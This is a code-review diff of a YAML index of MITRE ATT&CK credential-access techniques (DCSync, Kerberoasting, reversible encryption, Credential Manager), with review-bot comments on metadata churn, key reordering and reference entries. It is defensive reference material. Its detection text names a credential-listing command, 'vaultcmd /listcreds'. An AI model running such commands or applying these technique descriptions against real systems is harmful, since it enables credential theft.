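Review bot: after this hunk T1558.002 has no `x_mitre_attack_spec_version` at all (the `2.1.0` line is removed and nothing replaces it), unlike the other objects in this diff that are re-emitted at 3.2.0, and it still carries `x_mitre_permissions_required: - User`, the field that the T1003.008 and T1056 hunks drop. Either regenerate T1558.002 from the same source as the rest of the file or keep its existing spec-version line until that happens.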
@@ -47397,24 +48127,24 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Bernaldo Penas Antelo
+ - Mugdha Peter Bansode
+ - Uriel Kosayev
+ - Vadim Khrykov
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor process and command-line parameters of vaultcmd.exe
for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., vaultcmd /listcreds:“Windows Credentials”
).(Citation: Malwarebytes The Windows Vault)
Consider monitoring API calls such as CredEnumerateA
that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
Consider monitoring file reads to Vault locations, %Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\
, for suspicious activity.(Citation: Malwarebytes The Windows Vault)
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Bernaldo Penas Antelo
- - Mugdha Peter Bansode
- - Uriel Kosayev
- - Vadim Khrykov
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
@@ -47455,36 +48185,13 @@ credential-access:
url: https://www.passcape.com/windows_password_recovery_vault_explorer
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555.004
atomic_tests: []
T1556.001:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
- type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
@@ -47505,6 +48212,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -47519,52 +48227,42 @@ credential-access:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1556.005:
- technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.005:
+ technique:
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
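Review bot: this hunk interleaves the tail of T1556.001 with the head of T1556.005 purely because the key order changed (`external_references`, `object_marking_refs` and the spec-version keys now come after `x_mitre_data_sources`), so a handful of value changes show up as roughly fifty removed and forty added lines. Have the generator emit keys in a fixed order so that future regenerations of this index produce diffs that show only the changed values.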
@@ -47586,6 +48284,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -47596,23 +48295,50 @@ credential-access:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1111:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:37:20.612Z'
name: Multi-Factor Authentication Interception
description: "Adversaries may target multi-factor authentication (MFA) mechanisms,
(i.e., smart cards, token generators, etc.) to gain access to credentials
@@ -47683,9 +48409,8 @@ credential-access:
url: https://sec.okta.com/scatterswine
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1003.003:
technique:
@@ -47744,12 +48469,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.003
atomic_tests: []
T1558.003:
technique:
- modified: '2023-03-30T21:01:46.538Z'
+ modified: '2024-09-23T22:20:10.994Z'
name: 'Steal or Forge Kerberos Tickets: Kerberoasting'
description: "Adversaries may abuse a valid Kerberos ticket-granting ticket
(TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket
@@ -47781,6 +48505,7 @@ credential-access:
phase_name: credential-access
x_mitre_contributors:
- Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
TGS service ticket requests. Particularly investigate irregular patterns of
activity (ex: accounts making numerous requests, Event ID 4769, within a small
@@ -47790,7 +48515,6 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -47802,111 +48526,49 @@ credential-access:
id: attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee
created: '2020-02-11T18:43:38.588Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1558/003
external_id: T1558.003
+ - source_name: Microsoft Detecting Kerberoasting Feb 2018
+ description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+ using Azure Security Center. Retrieved March 23, 2018.
+ url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- source_name: Empire InvokeKerberoast Oct 2016
description: EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved
March 22, 2018.
url: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
+ - source_name: SANS Attacking Kerberos Nov 2014
+ description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+ Guard Dog of Hades. Retrieved March 22, 2018.
+ url: https://redsiege.com/kerberoast-slides
- source_name: AdSecurity Cracking Kerberos Dec 2015
description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
Domain. Retrieved March 22, 2018.
url: https://adsecurity.org/?p=2293
- - source_name: Microsoft Detecting Kerberoasting Feb 2018
- description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
- using Azure Security Center. Retrieved March 23, 2018.
- url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- - source_name: Microsoft SPN
- description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
- 2018.
- url: https://msdn.microsoft.com/library/ms677949.aspx
- source_name: Microsoft SetSPN
description: Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN
Syntax (Setspn.exe). Retrieved March 22, 2018.
url: https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
- - source_name: SANS Attacking Kerberos Nov 2014
- description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
- Guard Dog of Hades. Retrieved March 22, 2018.
- url: https://redsiege.com/kerberoast-slides
+ - source_name: Microsoft SPN
+ description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
+ 2018.
+ url: https://msdn.microsoft.com/library/ms677949.aspx
- source_name: Harmj0y Kerberoast Nov 2016
description: Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz.
- Retrieved March 23, 2018.
- url: https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
+ Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1558.003
atomic_tests: []
T1003.006:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ExtraHop
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
- type: attack-pattern
- created: '2020-02-11T18:45:34.293Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1003.006
- url: https://attack.mitre.org/techniques/T1003/006
- - url: https://msdn.microsoft.com/library/cc228086.aspx
- description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
- Service (DRS) Remote Protocol. Retrieved December 4, 2017.
- source_name: Microsoft DRSR Dec 2017
- - url: https://msdn.microsoft.com/library/dd207691.aspx
- description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
- 4, 2017.
- source_name: Microsoft GetNCCChanges
- - url: https://wiki.samba.org/index.php/DRSUAPI
- description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
- source_name: Samba DRSUAPI
- - url: https://source.winehq.org/WineAPI/samlib.html
- description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
- source_name: Wine API samlib.dll
- - url: https://adsecurity.org/?p=1729
- description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
- and Detection. Retrieved August 7, 2017.
- source_name: ADSecurity Mimikatz DCSync
- - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
- description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
- Oh My. Retrieved August 7, 2017.
- source_name: Harmj0y Mimikatz and DCSync
- - url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
- description: Warren, J. (2017, July 11). Manipulating User Passwords with
- Mimikatz. Retrieved December 4, 2017.
- source_name: InsiderThreat ChangeNTLM July 2017
- - url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
- description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
- August 7, 2017.
- source_name: GitHub Mimikatz lsadump Module
- - url: https://msdn.microsoft.com/library/cc237008.aspx
- description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
- Retrieved December 6, 2017.
- source_name: Microsoft NRPC Dec 2017
- - url: https://msdn.microsoft.com/library/cc245496.aspx
- description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
- Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
- source_name: Microsoft SAMR
- - url: https://adsecurity.org/?p=1729
- description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
- and Detection. Retrieved December 4, 2017.
- source_name: AdSecurity DCSync Sept 2015
- - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
- description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
- Oh My. Retrieved December 4, 2017.
- source_name: Harmj0y DCSync Sept 2015
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:54:08.312Z'
name: 'OS Credential Dumping: DCSync'
description: |-
Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
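Review bot: the reference list being removed here contains two pairs of entries that are the same article under two keys (`ADSecurity Mimikatz DCSync` and `AdSecurity DCSync Sept 2015` both point at https://adsecurity.org/?p=1729; `Harmj0y Mimikatz and DCSync` and `Harmj0y DCSync Sept 2015` are the same harmj0y post), and the description and detection text of this object cite both keys of each pair, so a regenerated block must keep both entries rather than deduplicate them or the `(Citation: ...)` lookups break. The only substantive change in this part of the hunk is the `modified` bump from `2022-04-25T14:00:00.188Z` to `2024-10-15T15:54:08.312Z`; the removed reference lines reappear lower in the object with a different key order.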
@@ -47917,26 +48579,88 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - ExtraHop
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)
Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Access'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
+ created: '2020-02-11T18:45:34.293Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/006
+ external_id: T1003.006
+ - source_name: GitHub Mimikatz lsadump Module
+ description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
+ August 7, 2017.
+ url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
+ - source_name: ADSecurity Mimikatz DCSync
+ description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+ and Detection. Retrieved August 7, 2017.
+ url: https://adsecurity.org/?p=1729
+ - source_name: AdSecurity DCSync Sept 2015
+ description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+ and Detection. Retrieved December 4, 2017.
+ url: https://adsecurity.org/?p=1729
+ - source_name: Microsoft DRSR Dec 2017
+ description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
+ Service (DRS) Remote Protocol. Retrieved December 4, 2017.
+ url: https://msdn.microsoft.com/library/cc228086.aspx
+ - source_name: Microsoft NRPC Dec 2017
+ description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
+ Retrieved December 6, 2017.
+ url: https://msdn.microsoft.com/library/cc237008.aspx
+ - source_name: Microsoft GetNCCChanges
+ description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
+ 4, 2017.
+ url: https://msdn.microsoft.com/library/dd207691.aspx
+ - source_name: Microsoft SAMR
+ description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
+ Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
+ url: https://msdn.microsoft.com/library/cc245496.aspx
+ - source_name: Samba DRSUAPI
+ description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
+ url: https://wiki.samba.org/index.php/DRSUAPI
+ - source_name: Harmj0y DCSync Sept 2015
+ description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+ Oh My. Retrieved December 4, 2017.
+ url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+ - source_name: Harmj0y Mimikatz and DCSync
+ description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+ Oh My. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+ - source_name: InsiderThreat ChangeNTLM July 2017
+ description: Warren, J. (2017, July 11). Manipulating User Passwords with
+ Mimikatz. Retrieved December 4, 2017.
+ url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
+ - source_name: Wine API samlib.dll
+ description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
+ url: https://source.winehq.org/WineAPI/samlib.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.006
atomic_tests: []
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
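Review bot: most of this hunk is generator churn rather than data change: each `external_references` entry is re-emitted with keys in `source_name` / `description` / `url` order instead of the previous `url` / `description` / `source_name`, and `type`, `id`, `created`, `created_by_ref` and `external_references` move from the top of the T1003.006 object to the bottom. If the exporter can write keys in a fixed order, future diffs of this index would show only the real edits. The real edits here are `x_mitre_version` `'1.0'` to `'1.1'`, `x_mitre_attack_spec_version` `2.1.0` to `3.2.0`, the new `x_mitre_contributors`, `x_mitre_deprecated`, `revoked`, `x_mitre_domains` and `x_mitre_platforms` keys, the dropped `spec_version: '2.1'`, and the removal of `x_mitre_permissions_required: - Administrator` with nothing replacing it; anything in the repo that filters techniques on `permissions_required` should be checked before merge. Note also that `Harmj0y Mimikatz and DCSync` picks up a new URL (`https://blog.harmj0y.net/...`, retrieved September 23, 2024) while its twin `Harmj0y DCSync Sept 2015` keeps the old `http://www.harmj0y.net/...` address, so the two entries no longer match even though they describe the same page.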
@@ -47949,6 +48673,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -47985,17 +48710,17 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
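Review bot: the platform list for T1556 drops `Azure AD`, `Google Workspace` and `Office 365` and adds `Office Suite` and `Identity Provider`, with `x_mitre_version` going `'2.4'` to `'2.5'`. That changes which platform buckets this technique belongs to, so any per-platform index that is derived from `x_mitre_platforms` has to be regenerated in the same change, and consumers that match on the old platform strings will silently stop matching. The `x_mitre_modified_by_ref` line added at the top of this hunk is a relocation of the same key removed further down the object, not a second copy; worth confirming the resulting YAML has exactly one.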
@@ -48041,81 +48766,10 @@ credential-access:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.004:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
- type: attack-pattern
- created: '2020-02-11T19:01:15.930Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1056.004
- url: https://attack.mitre.org/techniques/T1056/004
- - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
- description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
- Retrieved December 18, 2017.
- url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
- - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
- description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
- source_name: Microsoft Hook Overview
- - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
- A Technical Survey Of Common And Trending Process Injection Techniques.
- Retrieved December 7, 2017.'
- source_name: Elastic Process Injection July 2017
- - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
- description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
- Retrieved December 12, 2017.'
- source_name: Adlice Software IAT Hooks Oct 2014
- - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
- description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
- Mode. Retrieved December 20, 2017.'
- source_name: MWRInfoSecurity Dynamic Hooking 2015
- - url: https://www.exploit-db.com/docs/17802.pdf
- description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
- December 12, 2017.
- source_name: HighTech Bridge Inline Hooking Sept 2011
- - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
- description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
- Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
- source_name: Volatility Detecting Hooks Sept 2012
- - url: https://github.com/prekageo/winhook
- description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
- source_name: PreKageo Winhook Jul 2011
- - url: https://github.com/jay/gethooks
- description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
- 12, 2017.
- source_name: Jay GetHooks Sept 2011
- - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
- description: Felici, M. (2006, December 6). Any application-defined hook procedure
- on my machine?. Retrieved December 12, 2017.
- source_name: Zairon Hooking Dec 2006
- - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
- description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
- against user-land. Retrieved December 12, 2017.'
- source_name: EyeofRa Detecting Hooking June 2017
- - url: http://www.gmer.net/
- description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
- source_name: GMER Rootkits
- - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
